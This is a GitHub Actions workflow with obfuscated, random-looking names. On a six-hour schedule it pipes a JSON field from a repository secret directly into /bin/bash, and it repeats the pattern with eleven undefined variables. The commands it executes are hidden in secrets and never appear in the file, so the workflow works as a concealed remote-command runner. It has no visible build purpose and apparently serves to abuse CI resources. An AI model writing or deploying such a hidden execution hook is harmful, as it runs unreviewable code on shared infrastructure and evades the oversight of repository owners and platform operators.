name: chenglidai8018

on:
  workflow_dispatch:
  schedule:
    - cron: '26 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenglidai8018
        env:
          jer8539: ${{ secrets.jer8539 }}
        run: |
          echo $jer8539 | jq -r .i3 | /bin/bash
          echo $sthx44872 | jq -r .kor57 | /bin/bash
          echo $xpk51 | jq -r .fc7 | /bin/bash
          echo $sva7 | jq -r .cmu66 | /bin/bash
          echo $kgu15 | jq -r .wqjxu53 | /bin/bash
          echo $ngkq90554 | jq -r .rhwwe6 | /bin/bash
          echo $ezqnb5491 | jq -r .y71076 | /bin/bash
          echo $vo553 | jq -r .szh2 | /bin/bash
          echo $lbpy06060 | jq -r .tnj5 | /bin/bash
          echo $ca037 | jq -r .hyu2 | /bin/bash
          echo $svkaj6 | jq -r .chjs56818 | /bin/bash
          echo $qf62 | jq -r .b22 | /bin/bash

